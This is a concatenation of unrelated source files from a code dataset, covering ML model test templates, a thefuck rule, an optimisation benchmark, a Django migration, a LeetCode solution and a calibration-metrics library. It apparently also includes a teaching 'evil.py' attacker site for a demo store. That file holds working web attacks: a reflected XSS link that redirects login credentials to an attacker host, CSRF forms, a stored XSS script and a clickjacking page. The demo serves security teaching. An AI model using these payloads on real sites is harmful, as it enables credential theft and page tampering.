y_pred = clf.predict(X_test, raw_score=True)
clf.save_model('$model_filename') # save the model in txt format
np.savetxt('$true_predictions_filename', y_pred)
np.savetxt('$data_filename', X_test, delimiter='\t')
""")
go_template = Template("""
package main
import (
"github.com/dmitryikh/leaves"
"github.com/dmitryikh/leaves/mat"
)
func main() {
test, err := mat.DenseMatFromCsvFile("$data_filename", 0, false, "\t", 0.0)
if err != nil {
panic(err)
}
model, err := leaves.LGEnsembleFromFile("$model_filename", false)
if err != nil {
panic(err)
}
predictions := mat.DenseMatZero(test.Rows, model.NOutputGroups())
err = model.PredictDense(test.Values, test.Rows, test.Cols, predictions.Values, 0, 1)
if err != nil {
panic(err)
}
err = predictions.ToCsvFile("$predictions_filename", "\t")
if err != nil {
panic(err)
}
}
""")
class LGIrisRandomForest(LGBaseCase):
python_template = Template("""
import numpy as np
import pickle
from sklearn import datasets
import lightgbm as lgb
from sklearn.model_selection import train_test_split
data = datasets.load_iris()
X = data['data']
y = data['target']
y[y > 0] = 1
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
n_estimators = 30
d_train = lgb.Dataset(X_train, label=y_train)
params = {
'boosting_type': 'rf',
'objective': 'binary',
'bagging_fraction': 0.8,
'feature_fraction': 0.8,
'bagging_freq': 1,
}
clf = lgb.train(params, d_train, n_estimators)
y_pred = clf.predict(X_test)
model_filename = 'lg_rf_iris.model'
pred_filename = 'lg_rf_iris_true_predictions.txt'
# test_filename = 'iris_test.libsvm'
clf.save_model('$model_filename')
np.savetxt('$true_predictions_filename', y_pred)
datasets.dump_svmlight_file(X_test, y_test, '$data_filename')
""")
go_template = Template("""
package main
import (
"github.com/dmitryikh/leaves"
"github.com/dmitryikh/leaves/mat"
)
func main() {
test, err := mat.CSRMatFromLibsvmFile("$data_filename", 0, true)
if err != nil {
panic(err)
}
model, err := leaves.LGEnsembleFromFile("$model_filename", false)
if err != nil {
panic(err)
}
predictions := mat.DenseMatZero(test.Rows(), model.NOutputGroups())
err = model.PredictCSR(test.RowHeaders, test.ColIndexes, test.Values, predictions.Values, 0, 1)
if err != nil {
panic(err)
}
err = predictions.ToCsvFile("$predictions_filename", "\t")
if err != nil {
panic(err)
}
}
""")
class XGIrisMulticlass(XGBaseCase):
python_template = Template("""
import numpy as np
from sklearn import datasets
from sklearn.model_selection import train_test_split
import xgboost as xgb
X, y = datasets.load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
xg_train = xgb.DMatrix(X_train, label=y_train)
xg_test = xgb.DMatrix(X_test, label=y_test)
params = {
'objective': 'multi:softmax',
'num_class': 3,
}
n_estimators = 20
clf = xgb.train(params, xg_train, n_estimators)
y_pred = clf.predict(xg_test, output_margin=True)
# save the model in binary format
clf.save_model('$model_filename')
np.savetxt('$true_predictions_filename', y_pred, delimiter='\t')
datasets.dump_svmlight_file(X_test, y_test, '$data_filename')
""")
go_template = Template("""
package main
import (
"github.com/dmitryikh/leaves"
"github.com/dmitryikh/leaves/mat"
)
func main() {
test, err := mat.CSRMatFromLibsvmFile("$data_filename", 0, true)
if err != nil {
panic(err)
}
model, err := leaves.XGEnsembleFromFile("$model_filename", false)
if err != nil {
panic(err)
}
predictions := mat.DenseMatZero(test.Rows(), model.NOutputGroups())
err = model.PredictCSR(test.RowHeaders, test.ColIndexes, test.Values, predictions.Values, 0, 1)
if err != nil {
panic(err)
}
err = predictions.ToCsvFile("$predictions_filename", "\t")
if err != nil {
panic(err)
}
}
""")
def compare(self):
self.compare_matrices(
matrix1_filename=self.files['true_predictions_filename'],
matrix2_filename=self.files['predictions_filename'],
tolerance=1e-6,
max_number_of_mismatches_ratio=0.0
)
cases = [
LGBreastCancer,
LGIrisRandomForest,
XGIrisMulticlass,
]
| 23.6139 | 96 | 0.676422 |
5f9b478da97564c1c1c93c3479c4db395b105610 | 3,373 | py | Python | evil.py | takatama/bottle-store | e77859fb55cf85aa337e422e32614f36758368cf | [
"MIT"
] | null | null | null | evil.py | takatama/bottle-store | e77859fb55cf85aa337e422e32614f36758368cf | [
"MIT"
] | null | null | null | evil.py | takatama/bottle-store | e77859fb55cf85aa337e422e32614f36758368cf | [
"MIT"
] | null | null | null | from threading import ExceptHookArgs
from bottle import route, run, template, request, redirect, hook
import sqlite3
from datetime import datetime
HOST='evil.localtest.me'
PORT=8081
TARGET_URL='http://localhost:8080'
EVIL_DATABASE_FILE = 'evil.db'
@route('/')
def index():
if request.headers['HOST'] == 'localhost:' + str(PORT):
redirect('http://' + HOST + ':' + str(PORT))
return '''
<h1>攻撃者が準備したサイト</h1>
<ul>
<li><a href="/users">盗んだユーザー情報</a></li>
<li><a href="/game1">CSRF</a></li>
<li><a href="/game2">CSRF + Persistent XSS</a></li>
<li><a href="/game3">Clickjacking</a></li>
</ul>'''
@route('/users')
def list_users():
conn = sqlite3.connect(EVIL_DATABASE_FILE)
cur = conn.cursor()
users = cur.execute('SELECT * FROM users;').fetchall()
return template('''
<p>盗んだユーザー情報</p>
<table border="1">
<tr><th>時刻</th><th>メールアドレス</th><th>パスワード</th></tr>
%for user in users:
<tr><td>{{ user[1] }}</td><td>{{ user[2] }}</td><td>{{ user[3] }}</td></tr>
%end
</table>''', users=users)
@route('/users', method="post")
def add_user():
email = request.forms.email
password = request.forms.password
conn = sqlite3.connect(EVIL_DATABASE_FILE)
cur = conn.cursor()
cur.execute('INSERT INTO users (datetime, email, password) VALUES (?, ?, ?)', (datetime.now(), email, password))
conn.commit()
redirect(TARGET_URL + '/logout')
@route('/game0')
def show_game0():
return '''
<p>楽しいゲームで遊ぶには、<a target="_blank" href="http://localhost:8080/login?message=<script>window.onload=function(){document.querySelector('form').action='http://evil.localtest.me:8081/users'}</script>">ここをクリック</a>してね!</p>'''
@route('/game1')
def show_game1():
return template('''
<p>とっても楽しいゲームだよ!</p>
<form action="{{ url }}/reviews" method="post">
<input type="hidden" name="product_id" value="1" />
<input type="hidden" name="user_id" value="1" />
<input type="hidden" name="rate" value="5" />
<input type="hidden" name="comment" value="最高の商品です!本当は★100を付けたいくらい!" />
<input type="submit" value="遊んでみる" />
</form>''', url=TARGET_URL)
@route('/game2')
def show_game2():
return template('''
<p>いまだかつてないくらい楽しいゲームだよ!</p>
<form action="{{ url }}/reviews" method="post">
<input type="hidden" name="product_id" value="1" />
<input type="hidden" name="user_id" value="1" />
<input type="hidden" name="rate" value="5" />
<input type="hidden" name="comment" value="本当は★100を付けたいくらい最高の商品なのに、今だけ100円で売ってます!!<script>window.onload=function(){
var td = document.querySelectorAll('tr td')[7];
td.innerHTML = '<s>' + td.innerHTML + '</s><b>今だけ100円!!</b>';
}</script>" />
<input type="submit" value="遊んでみる" />
</form>''', url=TARGET_URL)
@route('/game3')
def show_game3():
return template('''
<p>下の方に面白いゲームが遊べるボタンがあるよ!ちゃんと押せるかな??</p>
<p><input type="checkbox" onchange="invisible(this.checked)">消す</p>
<iframe src="{{ url }}/products" width="800" height="1200"></iframe>
<button style="position:absolute; top:370; left:395; z-index:-1;">あそんでみる</button>
<script>function invisible(checked) {
const iframe = document.querySelector('iframe');
if (checked) {
iframe.style = 'opacity:0; filter:alpha(opacity=0);';
} else {
iframe.style = '';
}
}</script>''', url=TARGET_URL)
run(host=HOST, port=PORT, reloader=True) | 34.773196 | 218 | 0.632375 |
0ff01b929974cd7006efffccd07bcfde74b7f1db | 901 | py | Python | thefuck/rules/git_fix_stash.py | MJGrey/thefuck | c88b0792b8a2db3c181938af6c357662993a30c3 | [
"MIT"
] | 1 | 2018-07-06T04:10:56.000Z | 2018-07-06T04:10:56.000Z | thefuck/rules/git_fix_stash.py | MJGrey/thefuck | c88b0792b8a2db3c181938af6c357662993a30c3 | [
"MIT"
] | null | null | null | thefuck/rules/git_fix_stash.py | MJGrey/thefuck | c88b0792b8a2db3c181938af6c357662993a30c3 | [
"MIT"
] | 1 | 2018-07-06T04:11:05.000Z | 2018-07-06T04:11:05.000Z | from thefuck import utils
from thefuck.utils import replace_argument
from thefuck.specific.git import git_support
@git_support
def match(command):
if command.script_parts and len(command.script_parts) > 1:
return (command.script_parts[1] == 'stash'
and 'usage:' in command.stderr)
else:
return False
# git's output here is too complicated to be parsed (see the test file)
stash_commands = (
'apply',
'branch',
'clear',
'drop',
'list',
'pop',
'save',
'show')
@git_support
def get_new_command(command):
stash_cmd = command.script_parts[2]
fixed = utils.get_closest(stash_cmd, stash_commands, fallback_to_first=False)
if fixed is not None:
return replace_argument(command.script, stash_cmd, fixed)
else:
cmd = command.script_parts[:]
cmd.insert(2, 'save')
return ' '.join(cmd)
| 23.710526 | 81 | 0.658158 |
4d83a9bc5c1e22eebdcd7711f99b520fa37df307 | 1,560 | py | Python | ZDT1.py | jonatanlv/nsga-ii | a664827df037ba69ff7c3ab737d00cfa03bcb76f | [
"MIT"
] | 1 | 2019-07-28T00:15:45.000Z | 2019-07-28T00:15:45.000Z | ZDT1.py | jonatanlv/nsga-ii | a664827df037ba69ff7c3ab737d00cfa03bcb76f | [
"MIT"
] | null | null | null | ZDT1.py | jonatanlv/nsga-ii | a664827df037ba69ff7c3ab737d00cfa03bcb76f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Función Test ZDT1
"""
import Problem
import numpy as np
from Estadisticas import Estadisticas
def construir_problema(**kwargs):
def f1(X):
return X[0]
def g(X):
return 1 + 9*X[1:].sum()/(len(X) - 1)
def f2(X):
gX = g(X)
return gX * (1 - np.sqrt(f1(X) / gX))
objetivos = [f1, f2]
dimensiones = 30
''' Los límites de este problema son [0,1]^30 '''
limites = np.zeros((dimensiones,2))
limites[:, 0] = 0
limites[:, 1] = 1
''' Construimos el frente de Pareto asociado a este problema '''
soluciones = []
for i in np.linspace(0, 1, 500):
solucion = np.zeros(dimensiones)
solucion[0] = i
soluciones.append(solucion)
xs = [f1(p) for p in soluciones]
ys = [f2(p) for p in soluciones]
ys.insert(0,float('inf'))
macc = [min(ys[:i]) for y, i in zip(ys, range(1,len(ys)+1))]
fp = {}
fp['frente'] = np.array([(xx, yy) for xx, yy,m in zip(xs, ys[1:],macc) if yy < m])
fp['extremos'] = [fp['frente'][0], fp['frente'][-1]]
''' Parámetros '''
parametros = Problem.Params()
parametros.update(kwargs)
''' Estadísticas '''
estadisticas = Estadisticas(kwargs.get('nom_stats', 'estadisticas'))
''' Lo empaquetamos todo '''
problema = Problem.Problem(objetivos, dimensiones, limites, frentePareto = fp, parametros = parametros, stats = estadisticas)
return problema | 28.363636 | 130 | 0.540385 |
70df2bf9799646fd1a3dcf35fe863acd41612795 | 3,270 | py | Python | backend/api/migrations/0004_auto_20210523_1306.py | Technocrats-nitw/Care | 8649e874340339b9ada089702343919fe557c26e | [
"CC0-1.0"
] | 1 | 2021-06-09T09:17:33.000Z | 2021-06-09T09:17:33.000Z | backend/api/migrations/0004_auto_20210523_1306.py | Technocrats-nitw/GoVID | 8649e874340339b9ada089702343919fe557c26e | [
"CC0-1.0"
] | null | null | null | backend/api/migrations/0004_auto_20210523_1306.py | Technocrats-nitw/GoVID | 8649e874340339b9ada089702343919fe557c26e | [
"CC0-1.0"
] | null | null | null | # Generated by Django 3.1.5 on 2021-05-23 07:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0003_auto_20210521_0134'),
]
operations = [
migrations.RemoveField(
model_name='doctors',
name='age',
),
migrations.RemoveField(
model_name='doctors',
name='gender',
),
migrations.RemoveField(
model_name='doctors',
name='location',
),
migrations.RemoveField(
model_name='doctors',
name='specialisation',
),
migrations.RemoveField(
model_name='doctors',
name='state',
),
migrations.RemoveField(
model_name='doctors',
name='year_dob',
),
migrations.AddField(
model_name='doctors',
name='city',
field=models.CharField(default='City', max_length=20),
),
migrations.AddField(
model_name='doctors',
name='contact',
field=models.IntegerField(default=0),
preserve_default=False,
),
migrations.AddField(
model_name='doctors',
name='experience',
field=models.IntegerField(default=0),
preserve_default=False,
),
migrations.AddField(
model_name='doctors',
name='image',
field=models.CharField(default='-', max_length=600),
preserve_default=False,
),
migrations.AddField(
model_name='doctors',
name='latitude',
field=models.FloatField(default=0),
preserve_default=False,
),
migrations.AddField(
model_name='doctors',
name='locality',
field=models.CharField(default='-', max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='doctors',
name='longitude',
field=models.FloatField(default=0),
preserve_default=False,
),
migrations.AddField(
model_name='doctors',
name='priceRange',
field=models.IntegerField(default=0),
preserve_default=False,
),
migrations.AddField(
model_name='doctors',
name='speciality',
field=models.CharField(default='-', max_length=60),
preserve_default=False,
),
migrations.AddField(
model_name='doctors',
name='type',
field=models.CharField(default='-', max_length=60),
preserve_default=False,
),
migrations.AddField(
model_name='doctors',
name='url',
field=models.URLField(default='-'),
preserve_default=False,
),
migrations.AlterField(
model_name='doctors',
name='email',
field=models.EmailField(max_length=255),
),
migrations.AlterField(
model_name='doctors',
name='name',
field=models.CharField(max_length=60),
),
]
| 28.938053 | 66 | 0.51896 |
501f24af1d91586770828741b55ecf2151a349e7 | 475 | py | Python | LeetCode/Aug 2021 LeetCoding Challenge/Subsets II.py | UtkarshPathrabe/Competitive-Coding | ba322fbb1b88682d56a9b80bdd92a853f1caa84e | [
"MIT"
] | 13 | 2021-09-02T07:30:02.000Z | 2022-03-22T19:32:03.000Z | LeetCode/Subsets II.py | UtkarshPathrabe/Competitive-Coding | ba322fbb1b88682d56a9b80bdd92a853f1caa84e | [
"MIT"
] | null | null | null | LeetCode/Subsets II.py | UtkarshPathrabe/Competitive-Coding | ba322fbb1b88682d56a9b80bdd92a853f1caa84e | [
"MIT"
] | 3 | 2021-08-24T16:06:22.000Z | 2021-09-17T15:39:53.000Z | class Solution:
def subsetsWithDup(self, nums: List[int]) -> List[List[int]]:
nums.sort()
result, numsCapacity = set(), len(nums)
def backtrack(currentSubset, startIndex):
result.add(tuple(currentSubset))
for i in range(startIndex, numsCapacity):
currentSubset.append(nums[i])
backtrack(currentSubset, i + 1)
currentSubset.pop()
backtrack([], 0)
return result | 39.583333 | 65 | 0.574737 |
e6757ed7c655051e09e360e2dd0bdc8b417eda2a | 190 | py | Python | simdeblur/scheduler/__init__.py | ljzycmd/SimDeblur | dd2f60c41176b75c4eaf80d740f547c206aa8227 | [
"MIT"
] | 190 | 2021-03-22T13:59:42.000Z | 2022-03-08T21:14:41.000Z | simdeblur/scheduler/__init__.py | ljzycmd/SimDeblur | dd2f60c41176b75c4eaf80d740f547c206aa8227 | [
"MIT"
] | 9 | 2021-04-26T06:44:40.000Z | 2022-03-25T07:48:30.000Z | simdeblur/scheduler/__init__.py | ljzycmd/SimDeblur | dd2f60c41176b75c4eaf80d740f547c206aa8227 | [
"MIT"
] | 27 | 2021-03-23T03:11:00.000Z | 2022-03-19T21:26:02.000Z | from .optim import *
from .lr_scheduler import *
from .build import build_optimizer
from .build import build_lr_scheduler
__all__ = [k for k in globals().keys() if not k.startswith("_")]
| 21.111111 | 64 | 0.747368 |
7a1172868b52be4b3c31cf12a1b46b7e0290740b | 19,366 | py | Python | eval_calibration/calibration_lib.py | thuyduongtt/region_based_active_learning | b3653c31a44135b5680949790549799c83a5a18b | [
"MIT"
] | null | null | null | eval_calibration/calibration_lib.py | thuyduongtt/region_based_active_learning | b3653c31a44135b5680949790549799c83a5a18b | [
"MIT"
] | null | null | null | eval_calibration/calibration_lib.py | thuyduongtt/region_based_active_learning | b3653c31a44135b5680949790549799c83a5a18b | [
"MIT"
] | null | null | null | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Library of calibration metrics."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import scipy.special
import six
from six.moves import range
from sklearn.metrics import confusion_matrix as sklearn_cm
def bin_predictions_and_accuracies(probabilities, ground_truth, bins=10):
"""A helper function which histograms a vector of probabilities into bins.
Args:
probabilities: A numpy vector of N probabilities assigned to each prediction
ground_truth: A numpy vector of N ground truth labels in {0,1}
bins: Number of equal width bins to bin predictions into in [0, 1], or an
array representing bin edges.
Returns:
bin_edges: Numpy vector of floats containing the edges of the bins
(including leftmost and rightmost).
accuracies: Numpy vector of floats for the average accuracy of the
predictions in each bin.
counts: Numpy vector of ints containing the number of examples per bin.
"""
_validate_probabilities(probabilities)
_check_rank_nonempty(rank=1,
probabilities=probabilities,
ground_truth=ground_truth)
if len(probabilities) != len(ground_truth):
raise ValueError(
'Probabilies and ground truth must have the same number of elements.')
if [v for v in ground_truth if v not in [0., 1., True, False]]:
raise ValueError(
'Ground truth must contain binary labels {0,1} or {False, True}.')
if isinstance(bins, int):
num_bins = bins
else:
num_bins = bins.size - 1
# Ensure probabilities are never 0, since the bins in np.digitize are open on
# one side.
probabilities = np.where(probabilities == 0, 1e-8, probabilities)
counts, bin_edges = np.histogram(probabilities, bins=bins, range=[0., 1.])
indices = np.digitize(probabilities, bin_edges, right=True)
accuracies = np.array([np.mean(ground_truth[indices == i])
for i in range(1, num_bins + 1)])
return bin_edges, accuracies, counts
def bin_centers_of_mass(probabilities, bin_edges):
probabilities = np.where(probabilities == 0, 1e-8, probabilities)
indices = np.digitize(probabilities, bin_edges, right=True)
return np.array([np.mean(probabilities[indices == i])
for i in range(1, len(bin_edges))])
def expected_calibration_error(probabilities, ground_truth, bins=15):
"""Compute the expected calibration error of a set of preditions in [0, 1].
Args:
probabilities: A numpy vector of N probabilities assigned to each prediction
ground_truth: A numpy vector of N ground truth labels in {0,1, True, False}
bins: Number of equal width bins to bin predictions into in [0, 1], or
an array representing bin edges.
Returns:
Float: the expected calibration error.
"""
bin_edges, accuracies, counts = bin_predictions_and_accuracies(
probabilities, ground_truth, bins)
bin_centers = bin_centers_of_mass(probabilities, bin_edges)
num_examples = np.sum(counts)
ece = np.sum([(counts[i] / float(num_examples)) * np.sum(
np.abs(bin_centers[i] - accuracies[i]))
for i in range(bin_centers.size) if counts[i] > 0])
return ece
def accuracy_top_k(probabilities, labels, top_k):
"""Computes the top-k accuracy of predictions.
A prediction is considered correct if the ground-truth class is among the k
classes with the highest predicted probabilities.
Args:
probabilities: Array of probabilities of shape [num_samples, num_classes].
labels: Integer array labels of shape [num_samples].
top_k: Integer. Number of highest-probability classes to consider.
Returns:
float: Top-k accuracy of predictions.
"""
_, ground_truth = _filter_top_k(probabilities, labels, top_k)
return ground_truth.any(axis=-1).mean()
def _filter_top_k(probabilities, labels, top_k):
"""Extract top k predicted probabilities and corresponding ground truths."""
labels_one_hot = np.zeros(probabilities.shape)
labels_one_hot[np.arange(probabilities.shape[0]), labels] = 1
if top_k is None:
return probabilities, labels_one_hot
# Negate probabilities for easier use with argpartition (which sorts from
# lowest)
negative_prob = -1. * probabilities
ind = np.argpartition(negative_prob, top_k - 1, axis=-1)
top_k_ind = ind[:, :top_k]
rows = np.expand_dims(np.arange(probabilities.shape[0]), axis=1)
lowest_k_negative_probs = negative_prob[rows, top_k_ind]
output_probs = -1. * lowest_k_negative_probs
labels_one_hot_k = labels_one_hot[rows, top_k_ind]
return output_probs, labels_one_hot_k
def get_multiclass_predictions_and_correctness(probabilities, labels, top_k=1):
"""Returns predicted class, correctness boolean vector."""
_validate_probabilities(probabilities, multiclass=True)
_check_rank_nonempty(rank=1, labels=labels)
_check_rank_nonempty(rank=2, probabilities=probabilities)
if top_k == 1:
class_predictions = np.argmax(probabilities, -1)
top_k_probs = probabilities[np.arange(len(labels)), class_predictions]
is_correct = np.equal(class_predictions, labels)
else:
top_k_probs, is_correct = _filter_top_k(probabilities, labels, top_k)
return top_k_probs, is_correct
def expected_calibration_error_multiclass(probabilities, labels, bins=15,
top_k=1):
"""Computes expected calibration error from Guo et al. 2017.
For details, see https://arxiv.org/abs/1706.04599.
Note: If top_k is None, this only measures calibration of the argmax
prediction.
Args:
probabilities: Array of probabilities of shape [num_samples, num_classes].
labels: Integer array labels of shape [num_samples].
bins: Number of equal width bins to bin predictions into in [0, 1], or
an array representing bin edges.
top_k: Integer or None. If integer, use the top k predicted
probabilities in ECE calculation (can be informative for problems with
many classes and lower top-1 accuracy). If None, use all classes.
Returns:
float: Expected calibration error.
"""
top_k_probs, is_correct = get_multiclass_predictions_and_correctness(
probabilities, labels, top_k)
top_k_probs = top_k_probs.flatten()
is_correct = is_correct.flatten()
return expected_calibration_error(top_k_probs, is_correct, bins)
# TODO(yovadia): Write unit-tests.
def compute_accuracies_at_confidences(labels, probs, thresholds):
"""Compute accuracy of samples above each confidence threshold.
Args:
labels: Array of integer categorical labels.
probs: Array of categorical probabilities.
thresholds: Array of floating point probability thresholds in [0, 1).
Returns:
accuracies: Array of accuracies over examples with confidence > T for each T
in thresholds.
counts: Count of examples with confidence > T for each T in thresholds.
"""
assert probs.shape[:-1] == labels.shape
predict_class = probs.argmax(-1)
predict_confidence = probs.max(-1)
shape = (len(thresholds),) + probs.shape[:-2]
accuracies = np.zeros(shape)
counts = np.zeros(shape)
eq = np.equal(predict_class, labels)
for i, thresh in enumerate(thresholds):
mask = predict_confidence >= thresh
counts[i] = mask.sum(-1)
accuracies[i] = np.ma.masked_array(eq, mask=~mask).mean(-1)
return accuracies, counts
def brier_scores(labels, probs=None, logits=None):
"""Compute elementwise Brier score.
Args:
labels: Tensor of integer labels shape [N1, N2, ...]
probs: Tensor of categorical probabilities of shape [N1, N2, ..., M].
logits: If `probs` is None, class probabilities are computed as a softmax
over these logits, otherwise, this argument is ignored.
Returns:
Tensor of shape [N1, N2, ...] consisting of Brier score contribution from
each element. The full-dataset Brier score is an average of these values.
I will let my labels shape to be [num_samples], and the probs shape should be
[num_samples, num_classes]
"""
assert (probs is None) != (logits is None)
if probs is None:
probs = scipy.special.softmax(logits, axis=-1)
nlabels = probs.shape[-1]
flat_probs = probs.reshape([-1, nlabels])
flat_labels = labels.reshape([len(flat_probs)])
plabel = flat_probs[np.arange(len(flat_labels)), flat_labels]
out = np.square(flat_probs).sum(axis=-1) - 2 * plabel
return out.reshape(labels.shape)
# def brier_decompositions(labels, probs):
# """Compute Brier decompositions for batches of datasets.
# Args:
# labels: Tensor of integer labels shape [S1, S2, ..., N]
# probs: Tensor of categorical probabilities of shape [S1, S2, ..., N, M].
# Returns:
# Tensor of shape [S1, S2, ..., 3] consisting of 3-component Brier
# decompositions for each series of probabilities and labels. The components
# are ordered as <uncertainty, resolution, reliability>.
# """
# labels = tf.cast(labels, tf.int32)
# probs = tf.cast(probs, tf.float32)
# batch_shape = labels.shape[:-1]
# flatten, unflatten = _make_flatten_unflatten_fns(batch_shape)
# labels = flatten(labels)
# probs = flatten(probs)
# out = []
# for labels_i, probs_i in zip(labels, probs):
# out_i = brier_decomposition(labels_i, probabilities=probs_i)
# out.append(tf.stack(out_i, axis=-1))
# out = tf.stack(out)
# return unflatten(out)
# def brier_decomposition(labels=None, logits=None, probabilities=None):
# r"""Decompose the Brier score into uncertainty, resolution, and reliability.
# [Proper scoring rules][1] measure the quality of probabilistic predictions;
# any proper scoring rule admits a [unique decomposition][2] as
# `Score = Uncertainty - Resolution + Reliability`, where:
# * `Uncertainty`, is a generalized entropy of the average predictive
# distribution; it can both be positive or negative.
# * `Resolution`, is a generalized variance of individual predictive
# distributions; it is always non-negative. Difference in predictions reveal
# information, that is why a larger resolution improves the predictive score.
# * `Reliability`, a measure of calibration of predictions against the true
# frequency of events. It is always non-negative and a lower value here
# indicates better calibration.
# This method estimates the above decomposition for the case of the Brier
# scoring rule for discrete outcomes. For this, we need to discretize the space
# of probability distributions; we choose a simple partition of the space into
# `nlabels` events: given a distribution `p` over `nlabels` outcomes, the index
# `k` for which `p_k > p_i` for all `i != k` determines the discretization
# outcome; that is, `p in M_k`, where `M_k` is the set of all distributions for
# which `p_k` is the largest value among all probabilities.
# The estimation error of each component is O(k/n), where n is the number
# of instances and k is the number of labels. There may be an error of this
# order when compared to `brier_score`.
# #### References
# [1]: Tilmann Gneiting, Adrian E. Raftery.
# Strictly Proper Scoring Rules, Prediction, and Estimation.
# Journal of the American Statistical Association, Vol. 102, 2007.
# https://www.stat.washington.edu/raftery/Research/PDF/Gneiting2007jasa.pdf
# [2]: Jochen Broecker. Reliability, sufficiency, and the decomposition of
# proper scores.
# Quarterly Journal of the Royal Meteorological Society, Vol. 135, 2009.
# https://rmets.onlinelibrary.wiley.com/doi/epdf/10.1002/qj.456
# Args:
# labels: Tensor, (n,), with tf.int32 or tf.int64 elements containing ground
# truth class labels in the range [0,nlabels].
# logits: Tensor, (n, nlabels), with logits for n instances and nlabels.
# probabilities: Tensor, (n, nlabels), with predictive probability
# distribution (alternative to logits argument).
# Returns:
# uncertainty: Tensor, scalar, the uncertainty component of the
# decomposition.
# resolution: Tensor, scalar, the resolution component of the decomposition.
# reliability: Tensor, scalar, the reliability component of the
# decomposition.
# """
# if (logits is None) == (probabilities is None):
# raise ValueError(
# 'brier_decomposition expects exactly one of logits or probabilities.')
# if probabilities is None:
# probabilities = scipy.special.softmax(logits, axis=1)
# _, nlabels = probabilities.shape # Implicit rank check.
# # Compute pbar, the average distribution
# pred_class = tf.argmax(probabilities, axis=1, output_type=tf.int32)
# confusion_matrix = tf.math.confusion_matrix(pred_class, labels, nlabels,
# dtype=tf.float32)
# dist_weights = tf.reduce_sum(confusion_matrix, axis=1)
# dist_weights /= tf.reduce_sum(dist_weights)
# pbar = tf.reduce_sum(confusion_matrix, axis=0)
# pbar /= tf.reduce_sum(pbar)
# # dist_mean[k,:] contains the empirical distribution for the set M_k
# # Some outcomes may not realize, corresponding to dist_weights[k] = 0
# dist_mean = confusion_matrix / tf.expand_dims(
# tf.reduce_sum(confusion_matrix, axis=1) + 1.0e-7, 1)
# # Uncertainty: quadratic entropy of the average label distribution
# uncertainty = -tf.reduce_sum(tf.square(pbar))
# # Resolution: expected quadratic divergence of predictive to mean
# resolution = tf.square(tf.expand_dims(pbar, 1) - dist_mean)
# resolution = tf.reduce_sum(dist_weights * tf.reduce_sum(resolution, axis=1))
# # Reliability: expected quadratic divergence of predictive to true
# prob_true = tf.gather(dist_mean, pred_class, axis=0)
# reliability = tf.reduce_sum(tf.square(prob_true - probabilities), axis=1)
# reliability = tf.reduce_mean(reliability)
# return uncertainty, resolution, reliability
def brier_decomp_npy(labels=None, logits=None, probabilities=None):
if (logits is None) == (probabilities is None):
raise ValueError("brier decomposition expects either logits or probabilities")
if probabilities is None:
probabilities = scipy.special.softmax(logits, axis=1)
_, nlabels = probabilities.shape # [num_samples, num_class]
pred_class = np.argmax(probabilities, axis=1) # predicted label
confusion_matrix = sklearn_cm(y_pred=labels, y_true=pred_class,
labels=np.arange(nlabels))
dist_weights = np.sum(confusion_matrix, axis=1)
dist_weights = dist_weights / np.sum(dist_weights)
pbar = np.sum(confusion_matrix, axis=0)
pbar = pbar / np.sum(pbar)
dist_mean = confusion_matrix / np.expand_dims(np.sum(confusion_matrix, axis=1) + 1.0e-7, 1)
uncertainty = -np.sum(pbar ** 2)
resolution = (np.expand_dims(pbar, 1) - dist_mean) ** 2
resolution = np.sum(dist_weights * np.sum(resolution, axis=1))
prob_true = dist_mean[pred_class]
reliability = np.sum((prob_true - probabilities) ** 2, axis=1)
reliability = np.mean(reliability)
return uncertainty, resolution, reliability
def nll(probs):
"""Returns the negative loglikehood NLL calibration score
Args:
probs: [num_samples, num_class]
"""
pred_prob = np.max(probs, axis=-1)
nll_loss = np.log(pred_prob + 1e-8)
return -np.sum(nll_loss)
def soften_probabilities(probs, epsilon=1e-8):
"""Returns heavily weighted average of categorical distribution and uniform.
Args:
probs: Categorical probabilities of shape [num_samples, num_classes].
epsilon: Small positive value for weighted average.
Returns:
epsilon * uniform + (1-epsilon) * probs
"""
uniform = np.ones_like(probs) / probs.shape[-1]
return epsilon * uniform + (1 - epsilon) * probs
def get_quantile_bins(num_bins, probs, top_k=1):
"""Find quantile bin edges.
Args:
num_bins: int, number of bins desired.
probs: Categorical probabilities of shape [num_samples, num_classes].
top_k: int, number of highest-predicted classes to consider in binning.
Returns:
Numpy vector, quantile bin edges.
"""
edge_percentiles = np.linspace(0, 100, num_bins + 1)
if len(probs.shape) == 1:
probs = np.stack([probs, 1 - probs]).T
if top_k == 1:
max_probs = probs.max(-1)
else:
unused_labels = np.zeros(probs.shape[0]).astype(np.int32)
max_probs, _ = _filter_top_k(probs, unused_labels, top_k)
bins = np.percentile(max_probs, edge_percentiles)
bins[0], bins[-1] = 0., 1.
return bins
def _validate_probabilities(probabilities, multiclass=False):
if np.max(probabilities) > 1. or np.min(probabilities) < 0.:
raise ValueError('All probabilities must be in [0,1].')
if multiclass and not np.allclose(1, np.sum(probabilities, axis=-1),
atol=1e-5):
raise ValueError(
'Multiclass probabilities must sum to 1 along the last dimension.')
def _check_rank_nonempty(rank, **kwargs):
for key, array in six.iteritems(kwargs):
if len(array) <= 1 or array.ndim != rank:
raise ValueError(
'%s must be a rank-1 array of length > 1; actual shape is %s.' %
(key, array.shape))
# def _make_flatten_unflatten_fns(batch_shape):
# """Builds functions for flattening and unflattening batch dimensions."""
# batch_shape = tuple(batch_shape)
# batch_rank = len(batch_shape)
# ndims = np.prod(batch_shape)
# def flatten_fn(x):
# x_shape = tuple(x.shape)
# if x_shape[:batch_rank] != batch_shape:
# raise ValueError('Expected batch-shape=%s; received array of shape=%s' %
# (batch_shape, x_shape))
# flat_shape = (ndims,) + x_shape[batch_rank:]
# return tf.reshape(x, flat_shape)
# def unflatten_fn(x):
